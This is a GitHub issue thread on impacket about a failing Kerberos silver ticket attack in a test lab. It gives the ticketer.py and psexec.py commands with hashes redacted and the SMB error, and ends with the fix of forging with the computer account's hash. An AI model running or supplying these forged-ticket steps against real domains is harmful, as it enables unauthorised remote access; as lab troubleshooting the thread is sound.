### ISSUE TITLE
TGS (silver ticket) issue

### ISSUE THREAD

**Issue by Nicknam3** [SecureAuthCorp/impacket#1317]
Hi the Team,

I'm stuck on the same problem as the one described here:
 - https://github.com/SecureAuthCorp/impacket/issues/779

On my LAB just one AD (Windows 2016) and Ubuntu (WSL2) as an "attacker" that try to perfom silver ticket attack.
The time is synchronized on Ubuntu host by using the same time as domain controler: sudo ntpdate AD.BLABLA.LOCAL.

to reproduce the issue, I used the following commands:

```
python3 ticketer.py -nthash XXXXXXXXXXXXX -domain-sid XXXXXXXXX -domain BLABLA.LOCAL -dc-ip 192.168.20.100 -spn cifs/AD.BLABLA.LOCAL john
```

```
export KRB5CCNAME=john.ccache
```

```
psexec.py -k -no-pass AD.BLABLA.LOCAL -debug -dc-ip 192.168.20.100 -target-ip 192.168.20.100
```
and the error is:

```
impacket.smbconnection.SessionError: SMB SessionError: STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)
[-] SMB SessionError: STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.
```

On the AD, there is a declared SPN for the user john:

```
setspn -L john
Registered ServicePrincipalNames for CN=john,CN=Users,DC=blabla,DC=local:
        cifs/ad.blabla.local
```

The firewall is deactivated on the AD. I reboot the server multiple times.

The impacket version is the last one (i try a new instance on venv and same error).

Have you seen the same problem in your labs?

Thank you in advance for your help.

**Comment by anadrianmanrique** [comment]
I've been dealing with the same kerberos auth issue in an ubuntu vm. I've just tried running everything in a windows environment ( no WSL2 ) and it worked fine. I think there's a problem with ubuntu kernel and some networking configuration that makes impacket to break. So I think it should work fine probably in other linux distributions too?

**Comment by Nicknam3** [comment]
Hi,

Sorry for the delay, it is the same on new VMs (new AD 2016 + new Linux VM - Fedora).

if you have an idea of what can happen, thank you in advance.

**Comment by Nicknam3** [comment]
@Hackndo solve my problem.

I used a user account on my nthash but CIFS need computer account instead.

Thanks to him ! ^^

I close this ticket.
